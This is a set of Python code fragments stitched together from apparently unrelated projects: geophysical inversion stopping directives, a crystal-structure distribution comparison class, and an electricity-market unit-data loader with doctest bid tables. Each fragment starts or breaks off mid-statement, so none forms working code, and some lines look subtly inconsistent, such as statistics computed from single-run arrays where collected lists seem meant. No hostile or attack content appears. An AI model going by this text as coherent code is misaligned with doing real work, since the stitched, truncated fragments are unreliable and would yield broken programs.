].objfcts[self.smallness[1]] if self.debug: print( type( self.invProb.reg.objfcts[self.smallness[0]].objfcts[ self.smallness[1] ] ) ) self._regmode = 1 else: smallness = np.r_[ [ ( np.r_[ j, ( isinstance( regpart, PGIwithNonlinearRelationshipsSmallness, ) or isinstance(regpart, PGIsmallness) ), ] ) for j, regpart in enumerate(self.invProb.reg.objfcts) ] ] if smallness[smallness[:, 1] == 1][:, :1].size == 0: if self.TriggerSmall: warnings.warn( "There is no PGI regularization. Smallness target is turned off (TriggerSmall flag)." 
) self.TriggerSmall = False self.smallness = -1 else: self.smallness = smallness[smallness[:, 1] == 1][:, :1][0] self.pgi_smallness = self.invProb.reg.objfcts[self.smallness[0]] if self.debug: print(type(self.invProb.reg.objfcts[self.smallness[0]])) self._regmode = 2 @property def DMtarget(self): if getattr(self, "_DMtarget", None) is None: # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2 if self.phi_d_star is None: # Check if it is a ComboObjective if isinstance(self.dmisfit, ComboObjectiveFunction): self.phi_d_star = np.r_[[0.5 * survey.nD for survey in self.survey]] else: self.phi_d_star = np.r_[[0.5 * self.survey.nD]] self._DMtarget = self.chifact * self.phi_d_star return self._DMtarget @DMtarget.setter def DMtarget(self, val): self._DMtarget = val @property def CLtarget(self): if not getattr(self.pgi_smallness, "approx_eval", True): # if nonlinear prior, compute targer numerically at each GMM update samples, _ = self.pgi_smallness.gmm.sample( len(self.pgi_smallness.gmm.cell_volumes) ) self.phi_ms_star = self.pgi_smallness( mkvc(samples), externalW=self.WeightsInTarget ) self._CLtarget = self.chiSmall * self.phi_ms_star elif getattr(self, "_CLtarget", None) is None: # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2 if self.phi_ms_star is None: # Expected value is number of active cells * number of physical # properties self.phi_ms_star = 0.5 * len(self.invProb.model) self._CLtarget = self.chiSmall * self.phi_ms_star return self._CLtarget @property def CLnormalizedConstant(self): if ~self.WeightsInTarget: return 1.0 elif np.any(self.smallness == -1): return np.sum( sp.csr_matrix.diagonal(self.invProb.reg.objfcts[0].W) ** 2.0 ) / len(self.invProb.model) else: return np.sum(sp.csr_matrix.diagonal(self.pgi_smallness.W) ** 2.0) / len( self.invProb.model ) @CLtarget.setter def CLtarget(self, val): self._CLtarget = val def phims(self): if np.any(self.smallness == -1): return self.invProb.reg.objfcts[0](self.invProb.model) else: return ( self.pgi_smallness(self.invProb.model, externalW=self.WeightsInTarget,) / self.CLnormalizedConstant ) def ThetaTarget(self): maxdiff = 0.0 for i in range(self.invProb.reg.gmm.n_components): meandiff = np.linalg.norm( (self.invProb.reg.gmm.means_[i] - self.invProb.reg.gmmref.means_[i]) / self.invProb.reg.gmmref.means_[i], ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, meandiff) if ( self.invProb.reg.gmm.covariance_type == "full" or self.invProb.reg.gmm.covariance_type == "spherical" ): covdiff = np.linalg.norm( ( self.invProb.reg.gmm.covariances_[i] - self.invProb.reg.gmmref.covariances_[i] ) / self.invProb.reg.gmmref.covariances_[i], ord=self.distance_norm, ) else: covdiff = np.linalg.norm( ( self.invProb.reg.gmm.covariances_ - self.invProb.reg.gmmref.covariances_ ) / self.invProb.reg.gmmref.covariances_, ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, covdiff) pidiff = np.linalg.norm( [ ( self.invProb.reg.gmm.weights_[i] - self.invProb.reg.gmmref.weights_[i] ) / self.invProb.reg.gmmref.weights_[i] ], ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, pidiff) return maxdiff def endIter(self): self.AllStop = False self.DM = False self.CL = True self.DP = True self.dmlist = np.r_[[dmis(self.invProb.model) for dmis in self.dmisfit.objfcts]] self.targetlist = np.r_[ [dm < tgt for dm, tgt in zip(self.dmlist, self.DMtarget)] ] if np.all(self.targetlist): self.DM = True if self.TriggerSmall and np.any(self.smallness != -1): if self.phims() > self.CLtarget: self.CL = False if self.TriggerTheta: if 
self.ThetaTarget() > self.ToleranceTheta: self.DP = False self.AllStop = self.DM and self.CL and self.DP if self.verbose: message = "geophys. misfits: " + "; ".join( map( str, [ "{0} (target {1} [{2}])".format(val, tgt, cond) for val, tgt, cond in zip( np.round(self.dmlist, 1), np.round(self.DMtarget, 1), self.targetlist, ) ], ) ) if self.TriggerSmall: message += " | smallness misfit: {0:.1f} (target: {1:.1f} [{2}])".format( self.phims(), self.CLtarget, self.CL ) if self.TriggerTheta: message += " | GMM parameters within tolerance: {}".format(self.DP) print(message) if self.AllStop: self.opt.stopNextIteration = True if self.verbose: print("All targets have been reached") class SaveEveryIteration(InversionDirective): """SaveEveryIteration This directive saves an array at each iteration. The default directory is the current directory and the models are saved as ``InversionModel-YYYY-MM-DD-HH-MM-iter.npy`` """ directory = properties.String("directory to save results in", default=".") name = properties.String( "root of the filename to be saved", default="InversionModel" ) @properties.validator("directory") def _ensure_abspath(self, change): val = change["value"] fullpath = os.path.abspath(os.path.expanduser(val)) if not os.path.isdir(fullpath): os.mkdir(fullpath) @property def fileName(self): if getattr(self, "_fileName", None) is None: from datetime import datetime self._fileName = "{0!s}-{1!s}".format( self.name, datetime.now().strftime("%Y-%m-%d-%H-%M") ) return self._fileName class SaveModelEveryIteration(SaveEveryIteration): """SaveModelEveryIteration This directive saves the model as a numpy array at each iteration. The default directory is the current directoy and the models are saved as ``InversionModel-YYYY-MM-DD-HH-MM-iter.npy`` """ def initialize(self): print( "SimPEG.SaveModelEveryIteration will save your models as: " "'{0!s}###-{1!s}.npy'".format(self.directory + os.path.sep, self.fileName) ) def endIter(self): np.save( "{0!s}{1:03d}-{2!s}".format( self.directory + os.path.sep, self.opt.iter, self.fileName ), self.opt.xc, ) class SaveOutputEveryIteration(SaveEveryIteration): """SaveOutputEveryIteration""" header = None save_txt = True beta = None phi_d = None phi_m = None phi_m_small = None phi_m_smooth_x = None phi_m_smooth_y = None phi_m_smooth_z = None phi = None def initialize(self): if self.save_txt is True: print( "SimPEG.SaveOutputEveryIteration will save your inversion " "progress as: '###-{0!s}.txt'".format(self.fileName) ) f = open(self.fileName + ".txt", "w") self.header = " # beta phi_d phi_m phi_m_small phi_m_smoomth_x phi_m_smoomth_y phi_m_smoomth_z phi\n" f.write(self.header) f.close() # Create a list of each self.beta = [] self.phi_d = [] self.phi_m = [] self.phi_m_small = [] self.phi_m_smooth_x = [] self.phi_m_smooth_y = [] self.phi_m_smooth_z = [] self.phi = [] def endIter(self): phi_s, phi_x, phi_y, phi_z = 0, 0,
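# A standalone, hypothetical sketch (not SimPEG code) of the stopping rule implemented by
# TargetMisfit above: with phi_d defined as 0.5 * ||dpred - dobs||^2, its expected value at
# the target fit is 0.5 * nD, so the default target is chifact * 0.5 * nD. It also sketches
# the JointScalingSchedule rebalancing step. All numbers below are made up.
import numpy as np

def target_misfit(n_data, chifact=1.0):
    phi_d_star = 0.5 * n_data
    return chifact * phi_d_star

if __name__ == '__main__':
    # A survey with 400 observations stops once phi_d drops below 200 (chifact = 1).
    assert target_misfit(400) == 200.0

    # JointScalingSchedule-style rebalancing: datasets still above target are scaled by the
    # median ratio target/misfit of the datasets already below target, then the multipliers
    # are renormalised to sum to one.
    dmlist = np.array([150.0, 500.0])          # current misfits per dataset
    dm_target = np.array([200.0, 200.0])       # per-dataset targets
    multipliers = np.array([0.5, 0.5])
    above = dmlist > dm_target
    warming = np.median(dm_target[~above] / dmlist[~above])
    multipliers[above] *= warming
    multipliers /= multipliers.sum()
    assert multipliers[1] > multipliers[0]     # the unfit dataset gets more weight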
be sampled several times). Returns: list of Kabsch RMSDs """ distances = self._randomized_rmsd( self.structure_list, self.structure_list, iterations, self.njobs ) return distances @staticmethod def _properties_test_statistics(property_list): """ Returns various descriptive statistics for an array. Inspired by what <NAME> (https://github.com/EricSchles) presented in the NYC data science meetup Args: property_list (list): list of numeric values for which descriptive statistics will be computed Returns: result_dict (dict): dictionary with descriptive statistics """ property_list = np.array(property_list) q1 = np.percentile(property_list, 25) q3 = np.percentile(property_list, 75) agostino = normaltest(property_list) result_dict = { "trimean": Statistics.trimean(property_list), "midhinge": Statistics.midhinge(property_list), "interquartile_mean": Statistics.interquartile_mean(property_list), "value_range": Statistics.val_range(property_list), "mid_range": Statistics.mid_range(property_list), "minimum": np.min(property_list), "maximum": np.max(property_list), "median": np.median(property_list), "stdev": np.std(property_list), "geometric_mean": gmean(property_list), "mean": np.mean(property_list), "interquartile_range": q3 - q1, "quartile_1": q1, "quartile_3": q3, "MAD": median_absolute_deviation(property_list), "kurtosis": kurtosis(property_list), "mode": mode(property_list), "variation": variation(property_list), "skew": skew(property_list), "D_Agostino_statistic": agostino[0], "D_Agostino_p_value": agostino[1], } return result_dict def properties_test_statistics(self): """ Returns: dictionary with descriptive statistics for each feature column. """ if self.list_of_list_mode: # concurrently loop of the different feature columns. with concurrent.futures.ProcessPoolExecutor( max_workers=self.njobs ) as executor: logger.debug("looping over feature columns for properties statistics") out_dict = {} for i, results_dict in enumerate( executor.map( DistStatistic._properties_test_statistics, self.property_list ) ): logger.debug("Creating statistics for %s", self.feature_names[i]) self.properties_statistics[self.feature_names[i]] = results_dict out_dict[self.feature_names[i]] = results_dict return out_dict else: out_dict = {} results_dict = DistStatistic._properties_test_statistics(self.property_list) self.properties_statistics[self.feature_names] = results_dict out_dict[self.feature_names] = results_dict return out_dict class DistComparison(Statistics): """ Comparator to compare the difference or similarity between two distributions. The idea is here to save the test statistics to the object such that we can then implement some dunder methods to compare different Comparator objects and e.g. find out which distributions are most similar to each other. 
""" def __init__( self, structure_list_1: list = None, structure_list_2: list = None, property_list_1: [list, pd.DataFrame] = None, property_list_2: [list, pd.DataFrame] = None, njobs: int = 2, ): """ Args: structure_list_1 (list): structure_list_2 (list): property_list_1 (list or pd.DataFrame): property_list_2 (list or pd.DataFrame): """ self.structure_list_1 = structure_list_1 self.structure_list_2 = structure_list_2 self.property_list_1 = property_list_1 self.property_list_2 = property_list_2 self.feature_names = [] self.qq_statistics = {} self.properties_statistics = {} self.rmsds = None self.jaccards = None self.random_structure_property = {} self.njobs = njobs if (property_list_1 is not None) and (property_list_2 is not None): if not isinstance(self.property_list_1, type(self.property_list_2)): raise ValueError("The two property inputs must be of same type") # Check if input is a dataframe. If this is the case, extract the column names # and convert it to list of lists if isinstance(property_list_1, pd.DataFrame): logger.debug( "Input seems to be a dataframe, will only use numeric data" ) self.list_of_list_mode = True self.property_list_1 = self.property_list_1._get_numeric_data() self.feature_names = self.property_list_1.columns.values logger.debug("will use %s as feature names", self.feature_names) _tmp_property_list_1 = [] for feature in self.feature_names: _tmp_property_list_1.append( self.property_list_1[feature].values.astype(np.float32).tolist() ) self.property_list_1 = _tmp_property_list_1 _tmp_property_list_2 = [] self.property_list_2 = self.property_list_2._get_numeric_data() for feature in self.feature_names: _tmp_property_list_2.append( self.property_list_2[feature].values.astype(np.float32).tolist() ) self.property_list_2 = _tmp_property_list_2 assert len(self.property_list_1) == len(self.feature_names) assert len(self.property_list_2) == len(self.feature_names) else: # Check if the input is a list of list (i.e. multiple feature columns) # if this is the case, we have to iterate over the lists to compute the test statistics if all(isinstance(i, list) for i in property_list_1): if all(isinstance(i, list) for i in property_list_2): self.list_of_list_mode = True self.feature_names = [ "_".join(["feature", i]) for i in range(len(self.property_list_1)) ] else: logger.error( "One input seems to be a list of list whereas the other one is not. " "The property lists must be both of the same type. Please check your inputs." ) else: if all(isinstance(i, list) for i in property_list_2): logger.error( "One input seems to be a list of list whereas the other one is not. " "The property lists must be both of the same type. Please check your inputs." 
) else: self.feature_names.append("feature_0") self.list_of_list_mode = False def __repr__(self): return "DistComparison" def __len__(self): return ( len(self.structure_list_1) + len(self.structure_list_2) + len(self.property_list_1) + len(self.property_list_2) ) @classmethod def from_folders( cls, folder_1: str, folder_2: str, property_list_1: [list, pd.DataFrame] = None, property_list_2: [list, pd.DataFrame] = None, extension="cif", njobs: int = 2, ): """Constructor method for a DistComparison object""" sl_1 = get_structure_list(folder_1, extension) sl_2 = get_structure_list(folder_2, extension) return cls(sl_1, sl_2, property_list_1, property_list_2, njobs=njobs) def randomized_graphs(self, iterations: int = 5000) -> list: """ Returns iterations times the Jaccard distance between structure graph of two randomly chosen structures Args: iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of jaccard distances """ jaccards = self._randomized_graphs( self.structure_list_1, self.structure_list_2, iterations, self.njobs ) self.jaccards = jaccards return jaccards def randomized_structure_property( self, feature: str = "density", iterations: int = 5000 ) -> list: """ Returns iterations times the Euclidean distance between two randomly chosen structures Args: feature (str): property that is used for the structure comparisons, available options are density, num_sites, volume. Default is density. iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of property distances """ distances = self._randomized_structure_property( self.structure_list_1, self.structure_list_2, feature, iterations, self.njobs, ) self.random_structure_property[feature] = distances return distances def randomized_rmsd(self, iterations: int = 5000) -> list: """ Returns iterations times the Kabsch RMSD between two randomly chosen structures Args: iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of Kabsch RMSDs """ distances = self._randomized_rmsd( self.structure_list_1, self.structure_list_2, iterations, self.njobs ) self.rmsds = distances return distances def cluster_comparison(self, n_runs: int = 4): """ Performs distance measurements based on (optimal) knn clustering. The following metrics are computed: - Optimal clustering on both property distributions based on a Shilouethette criterion - Clustering on the other distribution with the same number of clusters, distance between the centroids - max min (d(x_i, c_j)) and max min (d(x_i, c_i)), the maximum minimal distance between the data points and the cluster centroids - mean min (d(x_i, c_j)) and mean min (d(x_i, c_i)), the mean minimal distance between the data points and the cluster centroids - median min (d(x_i, c_j)) and median min (d(x_i, c_i)), the median minimal distance between the data points and the cluster centroids - trimean min (d(x_i, c_j)) and trimean min (d(x_i, c_i)), the trimean minimal distance between the data points and the cluster centroids - min min (d(x_i, c_j)) and min min (d(x_i, c_i)), the minimum minimal distance between the data points and the cluster centroids Ideally, one would want the outer metrics to be similar to the inner metrics. To avoid influences from from different scales/units, the data is standardized by default. 
As the outcome of the knn clusterings is randomized, especically if the clustering is bad, we bootstrap the metrics by default. Returns: dict with the metrics (floats) """ from sklearn.preprocessing import StandardScaler from scipy.spatial import KDTree n_cluster_1s = [] n_cluster_2s = [] k_d_1_1s_min = [] k_d_1_2s_min = [] k_d_2_2s_min = [] k_d_2_1s_min = [] k_d_1_1s_max = [] k_d_1_2s_max = [] k_d_2_2s_max = [] k_d_2_1s_max = [] k_d_1_1s_mean = [] k_d_1_2s_mean = [] k_d_2_2s_mean = [] k_d_2_1s_mean = [] k_d_1_1s_median = [] k_d_1_2s_median = [] k_d_2_2s_median = [] k_d_2_1s_median = [] k_d_1_1s_trimean = [] k_d_1_2s_trimean = [] k_d_2_2s_trimean = [] k_d_2_1s_trimean = [] distance_clustering_1s = [] distance_clustering_2s = [] for i in tqdm(range(n_runs)): knn_1, n_cluster_1 = self.optimal_knn( np.transpose(np.array(self.property_list_1)) ) n_cluster_1s.append(n_cluster_1) sc = StandardScaler() tree_1 = KDTree(knn_1.cluster_centers_) k_d_1_1, _ = tree_1.query( sc.fit_transform(np.transpose(np.array(self.property_list_1))), k=1 ) k_d_1_2, _ = tree_1.query( sc.fit_transform(np.transpose(np.array(self.property_list_2))), k=1 ) k_d_1_1s_min.append(np.min(k_d_1_1)) k_d_1_2s_min.append(np.min(k_d_1_2)) k_d_1_1s_max.append(np.max(k_d_1_1)) k_d_1_2s_max.append(np.max(k_d_1_2)) k_d_1_1s_mean.append(np.mean(k_d_1_1)) k_d_1_2s_mean.append(np.mean(k_d_1_2)) k_d_1_1s_median.append(np.median(k_d_1_1)) k_d_1_2s_median.append(np.median(k_d_1_2)) k_d_1_1s_trimean.append(self.trimean(k_d_1_1)) k_d_1_2s_trimean.append(self.trimean(k_d_1_2)) kmeans_1 = KMeans(n_clusters=n_cluster_1).fit( sc.fit_transform(np.transpose(np.array(self.property_list_2))) ) distance_clustering_1 = self.euclidean_distance( knn_1.cluster_centers_, kmeans_1.cluster_centers_ ) distance_clustering_1s.append(distance_clustering_1) knn_2, n_cluster_2 = self.optimal_knn( np.transpose(np.array(self.property_list_2)) ) n_cluster_2s.append(n_cluster_2) tree_2 = KDTree(knn_2.cluster_centers_) k_d_2_2, _ = tree_2.query( sc.fit_transform(np.transpose(np.array(self.property_list_2))), k=1 ) k_d_2_1, _ = tree_2.query( sc.fit_transform(np.transpose(np.array(self.property_list_1))), k=1 ) k_d_2_2s_min.append(np.min(k_d_2_2)) k_d_2_1s_min.append(np.min(k_d_2_1)) k_d_2_2s_max.append(np.max(k_d_2_2)) k_d_2_1s_max.append(np.max(k_d_2_1)) k_d_2_2s_mean.append(np.mean(k_d_2_2)) k_d_2_1s_mean.append(np.mean(k_d_2_1)) k_d_2_2s_median.append(np.median(k_d_2_2)) k_d_2_1s_median.append(np.median(k_d_2_1)) k_d_2_2s_trimean.append(self.trimean(k_d_2_2)) k_d_2_1s_trimean.append(self.trimean(k_d_2_1)) kmeans_2 = KMeans(n_clusters=n_cluster_2).fit( sc.fit_transform(np.transpose(np.array(self.property_list_1))) ) distance_clustering_2 = self.euclidean_distance( knn_2.cluster_centers_, kmeans_2.cluster_centers_ ) distance_clustering_2s.append(distance_clustering_2) result_dict = { "mean_n_cluster_1": np.mean(n_cluster_1s), "mean_n_cluster_2": np.mean(n_cluster_2s), "mean_euclidean_1": np.mean(distance_clustering_1s), "mean_euclidean_2": np.mean(distance_clustering_2s), "mean_max_min_inner_1": np.mean(k_d_1_1), "mean_max_min_outer_1": np.mean(k_d_1_2), "mean_max_min_inner_2": np.mean(k_d_2_2), "mean_max_min_outer_2": np.mean(k_d_2_1), "mean_mean_min_inner_1": np.mean(k_d_1_1), "mean_mean_min_outer_1": np.mean(k_d_1_2), "mean_mean_min_inner_2": np.mean(k_d_2_2), "mean_mean_min_outer_2": np.mean(k_d_2_1), "mean_median_min_inner_1": np.mean(k_d_1_1), "mean_median_min_outer_1": np.mean(k_d_1_2), "mean_median_min_inner_2": np.mean(k_d_2_2), "mean_median_min_outer_2": 
np.mean(k_d_2_1s_median), "mean_trimean_min_inner_1": np.mean(k_d_1_1s_trimean), "mean_trimean_min_outer_1": np.mean(k_d_1_2s_trimean),
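# A self-contained, hypothetical sketch (not part of DistComparison) of the inner/outer
# centroid-distance idea described in cluster_comparison above: cluster distribution 1,
# then measure how far points from distribution 1 (inner) and distribution 2 (outer) sit
# from those centroids; similar inner and outer statistics suggest similar distributions.
# The toy data and the fixed n_clusters=2 are assumptions made for brevity.
import numpy as np
from scipy.spatial import KDTree
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler

if __name__ == '__main__':
    rng = np.random.default_rng(0)
    dist_1 = np.vstack([rng.normal(0, 1, (100, 2)), rng.normal(5, 1, (100, 2))])
    dist_2 = np.vstack([rng.normal(0, 1, (100, 2)), rng.normal(5, 1, (100, 2))])

    sc = StandardScaler()
    x1 = sc.fit_transform(dist_1)
    x2 = sc.transform(dist_2)

    km = KMeans(n_clusters=2, n_init=10, random_state=0).fit(x1)
    tree = KDTree(km.cluster_centers_)
    inner, _ = tree.query(x1, k=1)   # distances of distribution 1 points to its own centroids
    outer, _ = tree.query(x2, k=1)   # distances of distribution 2 points to those centroids

    # For two draws from the same underlying distribution the summary statistics agree closely.
    print(np.mean(inner), np.mean(outer), np.max(inner), np.max(outer))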
1.0 5.0 .. ... ... ... ... ... ... 69 VPGS5 0 5.0 3.0 0.0 49.0 70 VPGS6 0 5.0 3.0 0.0 49.0 71 W/HOE#1 0 5.0 0.0 0.0 160.0 72 W/HOE#2 0 5.0 0.0 0.0 160.0 73 YABULU 0 5.0 6.0 6.0 83.0 <BLANKLINE> [74 rows x 6 columns] Returns ------- pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) \n end_mode the fast start mode the unit will end \n the dispatch interval in, (as `np.int64`) time_in_end_mode the amount of time the unit will have \n spend in the end mode at the end of the \n dispatch interval, (as `np.float64`) mode_two_length the length the units mode two, in minutes \n (as `np.float64`) mode_four_length the length the units mode four, in minutes \n (as `np.float64`) min_loading the mininum opperating level of the unit \n during mode three, in MW, (as `no.float64`) ================ ======================================== """ profiles = self._get_fast_start_profiles(unconstrained_dispatch=unconstrained_dispatch) return profiles.loc[:, ['unit', 'end_mode', 'time_in_end_mode', 'mode_two_length', 'mode_four_length', 'min_loading']] def _get_fast_start_profiles(self, unconstrained_dispatch=None): fast_start_profiles = self.fast_start_profiles fast_start_profiles = an.map_aemo_column_names_to_nempy_names(fast_start_profiles) fast_start_profiles = self._commit_fast_start_units_in_mode_zero_if_they_have_non_zero_unconstrained_dispatch( fast_start_profiles, unconstrained_dispatch) fast_start_profiles = self._fast_start_calc_end_interval_state(fast_start_profiles, self.dispatch_interval) return fast_start_profiles @staticmethod def _commit_fast_start_units_in_mode_zero_if_they_have_non_zero_unconstrained_dispatch(fast_start_profiles, unconstrained_dispatch): if unconstrained_dispatch is not None: unconstrained_dispatch = unconstrained_dispatch[unconstrained_dispatch['service'] == 'energy'] fast_start_profiles = pd.merge(fast_start_profiles, unconstrained_dispatch, on='unit') fast_start_profiles['current_mode'] = np.where((fast_start_profiles['current_mode'] == 0) & (fast_start_profiles['dispatch'] > 0.0), 1, fast_start_profiles['current_mode']) return fast_start_profiles @staticmethod def _fast_start_calc_end_interval_state(fast_start_profile, dispatch_interval): def clac_mode_length(data): if data['previous_mode'] == 1: return data['mode_one_length'] elif data['previous_mode'] == 2: return data['mode_two_length'] elif data['previous_mode'] == 3: return data['mode_three_length'] elif data['previous_mode'] == 4: return data['mode_four_length'] else: return np.inf fast_start_profile['previous_mode'] = fast_start_profile['current_mode'] fast_start_profile['current_mode_length'] = fast_start_profile.apply(lambda x: clac_mode_length(x), axis=1) fast_start_profile['time_in_current_mode_at_end'] = \ fast_start_profile['time_in_current_mode'] + dispatch_interval fast_start_profile['end_mode'] = np.where(fast_start_profile['time_in_current_mode_at_end'] > fast_start_profile['current_mode_length'], fast_start_profile['current_mode'] + 1, fast_start_profile['current_mode']) fast_start_profile['time_in_end_mode'] = np.where( fast_start_profile['end_mode'] != fast_start_profile['current_mode'], fast_start_profile['time_in_current_mode_at_end'] - fast_start_profile['current_mode_length'], fast_start_profile['time_in_current_mode_at_end']) fast_start_profile['time_after_mode_two'] = np.where((fast_start_profile['current_mode'] == 2) & (fast_start_profile['end_mode'] == 3), fast_start_profile['time_in_end_mode'], np.NAN) for i 
in range(1, 10): fast_start_profile['previous_mode'] = fast_start_profile['end_mode'] fast_start_profile['current_mode_length'] = fast_start_profile.apply(lambda x: clac_mode_length(x), axis=1) fast_start_profile['end_mode'] = np.where(fast_start_profile['time_in_end_mode'] > fast_start_profile['current_mode_length'], fast_start_profile['previous_mode'] + 1, fast_start_profile['previous_mode']) fast_start_profile['time_in_end_mode'] = np.where(fast_start_profile['end_mode'] != fast_start_profile['previous_mode'], fast_start_profile['time_in_end_mode'] - fast_start_profile['current_mode_length'], fast_start_profile['time_in_end_mode']) fast_start_profile['time_after_mode_two'] = np.where((fast_start_profile['current_mode'] == 2) & (fast_start_profile['end_mode'] == 3), fast_start_profile['time_in_end_mode'], fast_start_profile['time_after_mode_two']) fast_start_profile['mode_two_length'] = fast_start_profile['mode_two_length'].astype(np.float64) fast_start_profile['mode_four_length'] = fast_start_profile['mode_four_length'].astype(np.float64) fast_start_profile['min_loading'] = fast_start_profile['min_loading'].astype(np.float64) return fast_start_profile.loc[:, ['unit', 'min_loading', 'current_mode', 'end_mode', 'time_in_current_mode', 'time_in_end_mode', 'mode_one_length', 'mode_two_length', 'mode_three_length', 'mode_four_length', 'time_after_mode_two']] def get_unit_info(self): """Get unit information. Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> unit_data.get_unit_info() unit region dispatch_type loss_factor 0 AGLHAL SA1 generator 0.971500 1 AGLNOW1 NSW1 generator 1.003700 2 AGLSITA1 NSW1 generator 1.002400 3 AGLSOM VIC1 generator 0.984743 4 ANGAST1 SA1 generator 1.005674 .. ... ... ... ... 477 YWNL1 VIC1 generator 0.957300 478 YWPS1 VIC1 generator 0.969600 479 YWPS2 VIC1 generator 0.957300 480 YWPS3 VIC1 generator 0.957300 481 YWPS4 VIC1 generator 0.957300 <BLANKLINE> [482 rows x 4 columns] Returns ------- pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) region the market region in which the unit is \n located, (as `str`) dispatch_type whether the unit is a 'generator' or \n 'load', (as `str`) loss_factor the combined unit transmission and \n distribution loss_factor, (as np.float64) ================ ======================================== """ unit_details = self.unit_details unit_details['LOSSFACTOR'] = unit_details['TRANSMISSIONLOSSFACTOR'] * unit_details['DISTRIBUTIONLOSSFACTOR'] unit_details = unit_details.loc[:, ['DUID', 'DISPATCHTYPE', 'CONNECTIONPOINTID', 'REGIONID', 'LOSSFACTOR']] unit_details = an.map_aemo_column_names_to_nempy_names(unit_details) unit_details = an.map_aemo_column_values_to_nempy_name(unit_details, column='dispatch_type') return unit_details.loc[:, ['unit', 'region', 'dispatch_type', 'loss_factor']] def _get_unit_availability(self): bid_availability = self.get_unit_bid_availability() ugif_availability = self.get_unit_uigf_limits() return pd.concat([bid_availability, ugif_availability]) def get_processed_bids(self): """Get processed unit bids. The bids are processed by scaling for AGC enablement limits, scaling for scada ramp rates, scaling for the unconstrained intermittent generation forecast and enforcing the preconditions for enabling FCAS bids. For more info on these processes :download:`see AEMO docs <../../docs/pdfs/FCAS Model in NEMDE.pdf>`. 
Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> volume_bids, price_bids = unit_data.get_processed_bids() >>> volume_bids unit service 1 2 3 4 5 6 7 8 9 10 0 AGLHAL energy 0.0 0.0 0.0 0.0 0.0 0.0 60.0 0.0 0.0 160.0 1 AGLSOM energy 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 170.0 2 ANGAST1 energy 0.0 0.0 0.0 0.0 0.0 50.0 0.0 0.0 0.0 50.0 9 ARWF1 energy 0.0 241.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 23 BALBG1 energy 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 30.0 .. ... ... ... ... ... ... ... ... ... ... ... ... 364 YWPS4 raise_6s 0.0 0.0 0.0 10.0 5.0 0.0 0.0 0.0 0.0 10.0 365 YWPS4 lower_reg 0.0 0.0 0.0 0.0 0.0 0.0 0.0 20.0 0.0 0.0 366 YWPS4 raise_reg 0.0 0.0 0.0 0.0 0.0 0.0 5.0 10.0 0.0 5.0 369 SWAN_E lower_reg 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 52.0 370 SWAN_E raise_reg 0.0 0.0 0.0 5.0 0.0 0.0 3.0 0.0 0.0 49.0 <BLANKLINE> [591 rows x 12 columns] >>> price_bids unit service 1 2 3 4 5 6 7 8 9 10 0 AGLHAL energy -971.50000 0.000000 270.863915 358.298915 406.873915 484.593915 562.313915 1326.641540 10277.372205 13600.018785 1 AGLSOM energy -984.74292 0.000000 83.703148 108.321721 142.787723 279.666989 444.119057 985.727663 13097.937562 14278.732950 2 ANGAST1 energy -1005.67390 0.000000 125.709237 201.335915 300.887574 382.135969 593.337544 1382.650761 10678.245470 14582.271550 3 ARWF1 energy -969.10000 -63.001191 1.996346 4.002383 8.004766 15.999841 31.999682 63.999364 127.998728 14051.950000 4 BALBG1 energy -994.80000 0.000000 19.915896 47.372376 75.177036 109.447896 298.440000 443.133660 10047.489948 14424.600000 .. ... ... ... ... ... ... ... ... ... ... ... ... 586 ASQENC1 raise_6s 0.03000 0.300000 0.730000 0.990000 1.980000 5.000000 9.900000 17.700000 100.000000 10000.000000 587 ASTHYD1 raise_6s 0.00000 0.490000 1.450000 4.950000 9.950000 15.000000 60.000000 200.000000 1000.000000 14000.000000 588 VENUS1 raise_5min 0.00000 1.000000 2.780000 3.980000 4.980000 8.600000 9.300000 14.600000 20.000000 1000.000000 589 VENUS1 raise_60s 0.00000 1.000000 2.780000 3.980000 4.980000 8.600000 9.300000 14.600000 20.000000 1000.000000 590 VENUS1 raise_6s 0.01000 0.600000 2.780000 3.980000 4.980000 8.600000 9.300000 14.000000 20.000000 1000.000000 <BLANKLINE> [591 rows x 12 columns] Multiple Returns ---------------- volume_bids : pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) service the service the bid applies to, (as `str`) 1 the volume bid the first bid band, in MW, \n (as `np.float64`) : 10 the volume in the tenth bid band, in MW, \n (as `np.float64`) ================ ======================================== price_bids : pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) service the service the bid applies to, (as `str`) 1 the price of the first bid band, in MW, \n (as `np.float64`) : 10 the price of the the tenth bid band, in MW, \n (as `np.float64`) ================ ======================================== """ uigf_values = self.raw_input_loader.get_UIGF_values() BIDPEROFFER_D = self.volume_bids.drop(['RAMPDOWNRATE', 'RAMPUPRATE'], axis=1) initial_conditions = self.initial_conditions BIDDAYOFFER_D = self.price_bids unit_info = self.get_unit_info() unit_availability = self._get_unit_availability() agc_enablement_limits = self.raw_input_loader.get_agc_enablement_limits() BIDPEROFFER_D = _scaling_for_agc_enablement_limits(BIDPEROFFER_D, agc_enablement_limits) BIDPEROFFER_D = 
